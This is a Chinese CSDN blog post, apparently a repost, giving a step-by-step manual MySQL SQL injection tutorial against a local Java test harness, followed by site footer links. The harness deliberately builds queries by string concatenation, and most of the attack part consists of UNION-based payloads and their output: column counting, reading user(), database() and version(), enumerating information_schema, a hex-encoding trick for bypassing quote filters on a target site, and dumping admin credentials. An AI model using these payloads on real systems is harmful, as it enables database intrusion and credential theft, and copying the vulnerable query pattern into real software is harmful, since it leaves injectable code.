mysql窗口界面表格式手工录入_mysql手工注入

最新推荐文章于 2022-07-04 17:51:59 发布
最新推荐文章于 2022-07-04 17:51:59 发布
阅读量243 收藏
点赞数
文章标签: mysql窗口界面表格式手工录入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29631169/article/details/113219991
版权

以下是mynona本人原创的,奉献给大家,不要小看数据库注入

参考:

必备知识:

mysql的sql注释符号:#

无论mysql还是sqlServer数据库,里面都有information_schema这个数据库,这个数据库里面TABLES表保存了数据库所有表名,COLUMNS表保存了表   的所有字段名,我们暴库就是针对这两个表。

SQL UNION 操作符

UNION 操作符用于合并两个或多个 SELECT 语句的结果集。

请注意,UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。

LIMIT子句

LIMIT 子句用于规定要返回的记录的数目。

对于拥有成千上万条记录的大型表来说,LIMIT 子句是非常有用的。

语法:SELECT 列名称 FROM 表名称 LIMIT 开始位置, 行数

注意:开始位置可以省略,默认是0位置

测试代码:

数据库连接类

(适合mysql和MSSQL2008)

importjava.sql.Connection;public classDateExecute {privateString user;privateString password;privateString type;privateString databaseName;publicDateExecute(String type, String user, String password, String databaseName){this.type =type;this.user =user;this.password =password;this.databaseName =databaseName;

}publicConnection getConnection()throwsInstantiationException, IllegalAccessException,

ClassNotFoundException, SQLException {

Connection con= null;if(type.equals("mysql")){

String driverName= "com.mysql.jdbc.Driver";

Driver d=(Driver) Class.forName(driverName).newInstance();

con= DriverManager.getConnection("jdbc:mysql://localhost:3306/"+databaseName,

user, password);

}else{

String driverName= "com.microsoft.sqlserver.jdbc.SQLServerDriver";

Driver d=(Driver) Class.forName(driverName).newInstance();

con= DriverManager.getConnection("jdbc:sqlserver://localhost:1433; DatabaseName="+databaseName,

user, password);

}returncon;

}public List>getDateList(String sql)throwsInstantiationException, IllegalAccessException,

ClassNotFoundException, SQLException {

Connection conn=getConnection();

List> list = new ArrayList>();try{//stmt = conn.prepareStatement(sql);//ResultSet rs = stmt.executeQuery(sql);

Statement state =conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,ResultSet.CONCUR_READ_ONLY);

ResultSet rs=state.executeQuery(sql);

list=convertList(rs);

}catch(SQLException e) {

System.out.println("数据库连接失败");

e.printStackTrace();

}returnlist;

}private List convertList(ResultSet rs) throwsSQLException {

List list= newArrayList();

ResultSetMetaData md=rs.getMetaData();int columnCount = md.getColumnCount(); //Map rowData;

while (rs.next()) { //rowData = new HashMap(columnCount);

Map rowData = new HashMap();for (int i = 1; i <= columnCount; i++) {

rowData.put(md.getColumnName(i), rs.getObject(i));

}

list.add(rowData);

}returnlist;

}public int executeUpdate(String sql) throwsInstantiationException,

IllegalAccessException, ClassNotFoundException, SQLException {

Connection conn=getConnection();

Statement stmt;int success = 0;try{

stmt=conn.createStatement();

success=stmt.executeUpdate(sql);

}catch(SQLException e) {

System.out.println("数据库连接失败");

e.printStackTrace();

}returnsuccess;

}

}

测试类:

(我们就是在这个类里面构造注入的sql语句)

importjava.sql.SQLException;public classTestSql {public static void main(String[] args) throwsInstantiationException,

IllegalAccessException, ClassNotFoundException, SQLException {//”root”为你mysql用户名,“xxxxx”为密码,“school”为数据库名

DateExecute de = new DateExecute("mysql", "root", "XXXXX","school");//DateExecute de = new DateExecute("mssql", "sa", "abca157992.","school");//MYSQL

String sqlM= "select * from user;";

String sqlInsertM= "insert into user value(24,'mynona','122334')";

String sqlDeleteM= "delete from user where name = 'mynona'";

System.out.println(de.getDateList(sqlbefore+sql));//MSSQL/*String sqlbefore = "select * from student where id = 1 ";

String sql = " and 1=2 union select 1,column_name,3 from information_schema.columns where table_name='student'";

String sqlInsert = "insert into student values(6, 222, 111)";

String sqlDelete = "delete from student where id = 4";*/

//de.executeUpdate(sqlInsert);

}

}

测试数据库:

d5c1d1dd32661394859a3385f969d2bf.png

测试数据:

ded826fd5003c5ade606ad5d57614367.png

假设我们的目标是admin这个表,对于user这个表有个注入点:

Select * from user where name = ‘’;

具体如下:

public classTestSql {public static void main(String[] args) throwsInstantiationException,

IllegalAccessException, ClassNotFoundException, SQLException {

DateExecute de= new DateExecute("mysql", "root", "157992","school");

String name= "admin";

String password="mynona";

String sql= "select * from user where name = '" + name +"' and password = '" + password + "'";

System.out.println("执行的sql语句:\n" +sql);

System.out.println(de.getDateList(sql));

}

}

上面那条sql语句明显两个sql注入点,分别是name和password

运行上面的程序,可以正常输出:

[{id=1, name=admin, password=mynona}]

现在我们要针对name这个注入点构造注入的sql语句。

判断注入点:

目标:看看是否有注入

我们令

name ="mynona and 1=1 #";

然后指向上面的测试代码:

执行的sql语句:

select * from user where name = 'mynona' and 1=1 #' and password = 'mynona'

输出结果:

[{id=2, name=mynona, password=122334}]

还是之前的数据,没变化

再令:

name ="mynona and 1=2 #";

执行的sql语句:

select * from user where name = 'mynona' and 1=2 #' and password = 'mynona'

输出结果:

[]

没有数据了,说明有注入

(tip:sql语句中“#”后面的内容会被忽略)

判断字段数(重要):

目标:看看当前注入点select了几个字段

(知道这些字段数后以后我们做union语句时就等与这相等)

分别构造:

name ="mynona' order by 1 #"; 输出正常

name="mynona' order by 2 #";输出正常

name="mynona' order by 3 #";输出正常

name="mynona' order by 4 #";错误输出

由此可以知道当前的表有3个字段

然后我们联合查询:

name ="mynona' and 1=2 union select 1,2,3 #";

执行的sql语句:

select * from user where name = 'mynona' and 1=2 union select 1,2,3 #' and password = 'mynona'

输出结果:

[{id=1, name=2, password=3}]

查看用户名:

name ="mynona' and 1=2 union select 1,user(),3 #";

执行的sql语句:

select * from user where name = 'mynona' and 1=2 union select 1,user(),3 #' and password = 'mynona'

输出结果:

[{id=1, name=root@localhost, password=3}]

现在用户名出来了,是root

查看数据库:

name ="mynona' and 1=2 union select 1,database(),3 #";

执行的sql语句:

select * from user where name = 'mynona' and 1=2 union select 1,database(),3 #' and password = 'mynona'

输出结果:

[{id=1, name=school, password=3}]

当前数据库名也出来了:school

查看数据库版本:

name ="mynona' and 1=2 union select 1,version(),3 #";

执行的sql语句:

select * from user where name = 'mynona' and 1=2 union select 1,version(),3 #' and password = 'mynona'

输出结果:

[{id=1, name=5.5.34, password=3}]

可以看到mysql版本是5.5.34

开始爆库:

在mysql里有information_schema这个库,这个库里有tables表,表中有table_schema字段,这个字段储存的时mysql里所有的库名,同时还有table_name这个字段,储存的是MySQL里所有的表名。

25ce199f220d72ffb4c5d46fdd5334f6.png

遍历数据库school里面的所有表:

其实就是差information_schema数据库里面的TABLES表

a33c814c47a880b15e9185346ca8a8c2.png

name ="mynona' union select TABLE_NAME,2,3 from information_schema.tables where table_schema='school'# ";

提示:如果对方网站过滤了单引号的话,可以把字符转为16进制:

如school 的十六进制为:0x7363686F6F6C

那么上面那条语句可以变为:

name ="mynona' union select TABLE_NAME,2,3 from information_schema.tables where table_schema=0x7363686F6F6C# ";

执行的sql语句:

select * from user where name = 'mynona' union select TABLE_NAME,2,3 from information_schema.tables where table_schema=0x7363686F6F6C# ' and password = 'mynona'

输出结果:

[{id=2, name=mynona, password=122334}, {id=admin, name=2, password=3}, {id=user, name=2, password=3}]

可以看到school数据库的表为user, admin

看到这里,应该高兴,因为admin说不定就存储这管理员的用户名和密码

下面我们遍历admin表(其实就跟上面遍历user表差不多)

其实就是查询数据库information_schema表里面的COLUMNS表

4ba3b30f9f86d16743fc69b06191cd08.png

name ="mynona' union select 1,2,COLUMN_NAME from information_schema.`COLUMNS` where TABLE_NAME = 'admin'# ";

执行的sql语句:

select * from user where name = 'mynona' union select 1,2,COLUMN_NAME from information_schema.`COLUMNS` where TABLE_NAME = 'admin'# ' and password = 'mynona'

输出结果:

[{id=2, name=mynona, password=122334}, {id=1, name=2, password=id}, {id=1, name=2, password=name}, {id=1, name=2, password=phone}, {id=1, name=2, password=sex}, {id=1, name=2, password=tel}, {id=1, name=2, password=password}]

可以看到遍历出了表admin的字段为:id,name,phone,sex,tel,password

遍历name和password字段的数据:

name ="mynona' union select 1,concat(name),concat(password) from admin # ";

执行的sql语句:

select * from user where name = 'mynona' union select 1,concat(name),concat(password) from admin # ' and password = 'mynona'

输出结果:

[{id=2, name=mynona, password=122334}, {id=1, name=admin, password=mynona}]

得出:name=admin,password= mynona

就这样admin表遍历出来了

Panda Brick
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
图形界面下操作Mysql数据库
linzi0的专栏
09-18 3136
在前几篇博文《》
PHP、mysql手工注入
10-12
- **转义特殊字符**:使用函数如`mysql_real_escape_string`或`htmlspecialchars`来转义可能导致注入的字符。 - **最小权限原则**:数据库连接应使用只具有执行所需权限的低权限账户。 - **避免在SQL中拼接字符串...
mysql怎么用图形工具导入表_MYSQL数据库设计与应用
weixin_39769406的博客
11-24 367
第一部分1、判断题:MySQL是基于层次模型的数据库。选项:A:错B:对答案: 【错】2、判断题:主键不能作为另一个关系的外键。选项:A:错B:对答案: 【错】3、判断题:关系模型用二维表表示实体及联系。选项:A:错B:对答案: 【对】4、判断题:数据库是长期存储在计算机内的、有组织的数据集合。选项:A:对B:错答案: 【对】5、判断题:在SQL所支持的数据库系统的三级模结构中,视图属...
MYSQL数据库VALUES_MySQL基础知识——创建数据库和表
weixin_39839018的博客
11-20 292
点击上方SQL数据库开发,关注获取SQL视频教程SQL专栏SQL基础知识汇总SQL高级知识汇总创建数据库语法CREATEDATABASEdbname或CREATEDATABASE`dbname`注1、文章中大写单词默认为数据库关键字,小写单词为自定义内容2、创建数据库的第二种语法,在数据库名前后添加的符号(`),在键盘的左上角,Esc键的下面。是MySQL独有的定义对象的一种方...
MySQL命令行窗口执行sql脚本,批量执行SQL语句,批量更新数据
热门推荐
stargeng625的博客
10-25 1万+
例如mysqltest.sql脚本在D盘根目录, 进入MySQL的命令行窗口,直接输入如下命令即可批量执行脚本中的sql语句: source D:\mysqltest.sql 注:结尾不带分号执行。
mysql认识基础(如何使用界面工具sql基本语句操作1)
atangxue的博客
07-14 649
1.mysql中账号的管理 1.1创建用户并设置登录密码 sql语句示例:create user 用户名 identified by '密码'; ( 注:identified by会将纯文本密码加密作为散列值存储) 1. 2.查看用户信息 sql语句示例:select host,user,password from user; 图示:(注user表是指mysql数据库中的user表) user表中host列的值的意义 % ———>匹配所有主机; localhost ———> localhost
PHP+MySQL 手工注入语句大全 推荐
10-29
我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。
sql server 2008 mysql 手工注入
03-25
总的来说,SQL Server 2008和MySQL手工注入问题可以通过编程最佳实践、使用预处理语句、限制用户权限以及保持系统更新来有效预防。了解这些概念并能实际应用,对于任何IT专业人士,尤其是负责数据库管理和安全的...
MySql手工注入.doc#资源达人分享计划#
08-12
MySQL手工注入是网络安全领域中的一个重要话题,特别是在Web应用程序的安全防护中。MySQL数据库由于其广泛使用,成为了黑客攻击的目标。在本教程中,我们将探讨如何利用MySQL手工注入漏洞来获取敏感信息。 首先,...
QT+mysql.zip_MYSQL_QT图书_qt mysql_qt 增删改查_qt 界面
07-14
本系统实现了图书的增删改查功能,还有登录界面
关于录入界面的讨论
flexitime的专栏
05-22 1408
做数据库的程序,除了一些特殊的要求外,无外乎就是录入与查询,查询问题先不说,只是想讨论一下录入问题,录入数据时要做好的是准确及方便最好还要好看,如果是一些简单的数据录入的话,那么完全可以使用一个表格(Grid)来入,例如以下的截图:对于上述截图的程序我写了个基本的窗体,只要从这个窗体中派生出来,再稍加修改就可以完成这个功能了,我比较讨厌用鼠标去逐个设置DataSource,DataSe
mysql里的数据输入窗口是哪个_WINDOWS下使用Mysql 中碰到的问题记录
weixin_32388647的博客
02-28 159
问题:在cmd中输入net stop mysql反馈“服务名无效”win+R打开运行窗口,输入services.msc查看其中mysql的服务名,比如我的是叫做MySQL80让我们继续回到最开始的部分,在cmd窗口输入netstartMySQL80尴尬,又报错了!百度了才知道原来是因为我们的cmd窗口并不是使用管理员身份打开的,所以才会被系统拒绝访问!在以管理员身份启动后,输入上面的代码,My...
数据录入窗口的通用写法[转载]
tlammon的专栏
01-31 482
数据录入窗口的通用写法[转载] 2010-08-01 22:02:22| 分类: PB学习资料 | 标签:录入 窗口 通用 程序 |举报 |字号大中小 订阅 数据录入窗口有很多公用程序,这里进行简单总结,然后读者可以考虑使用继承、用户对象等方将这些公用内容封装起来,以便以后的开发中重用,从而提高软件的开发效率。公用程序总结以下几点: 1、插入
数据库系统原理课程总结3——SQL语句,建表,主键外键,存储过程,批量输入百万级数据
weixin_51529433的博客
01-28 4030
一、 请将你在作业2中设计的模变成关系数据库中的表,并完成以下任务。 按如下格要求在实验报告中描述所有涉及到的表的结构 在本次实验中,我设计了六个表格。 表1: 表2: 表3: 表4: 表5: 表6: 2.根据以上定义,写出各表的建表语句,并在你选的关系型数据库平台上建立各个表,请将建表语句统一写在扩展名为sql的文件中,构建一个建库脚本文本,命名要求为: DBLabScript_学号.sql 答:已完成SQL文件,可以再文件夹中查看(这里的文件我会上传资源,审核通过之后我会把链接放到评论
python-mysql期末实验:四、数据导入界面的制作
为人民服务
07-04 1321
本专栏目录:一、实验综述二、基于MySQL进行的数据库的搭建三、程序登录、注册界面的制作四、数据导入界面的制作(即本篇)五、collage(大学)表的增删改查界面的制作六、province(省份)表的增删改查界面的制作七、student_num(考生人数)表的增删改查界面以及数据可视化的制作八、min_score_line(最低分数线)表的增删改查界面以及数据可视化的制作九、collage_level(学校等级)表的增删改查界面的制作十、enrollment_type(招生类型)表的增删改查界面的制作十一、
窗口输入
weixin_30795127的博客
06-05 112
package tjc; import java.awt.event.ActionEvent;import java.awt.event.ActionListener; import javax.swing.JButton;import javax.swing.JFrame;import javax.swing.JLabel;import javax.swing.JPanel;imp...
MySQL命令行窗口快捷键
abvedu的博客
01-19 7350
进行MySQL数据库的基本操作时,不但要熟悉数据库的操作命令,还要熟悉命令(cmd)提示符窗口的操作技巧。长时间没有操作命令提示符窗口了,还真的需要熟悉一下。 快捷键: F1:按F1逐字显示最后一次执行的命令。 F2:按F2会提示“输入可复制的字符数量”,此时直接按下上次输入命令中包含的字符(区分大小写),这时,命令提示符后面将自动显示出你按下的字符之前的上次输入的命令字符。有些绕
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值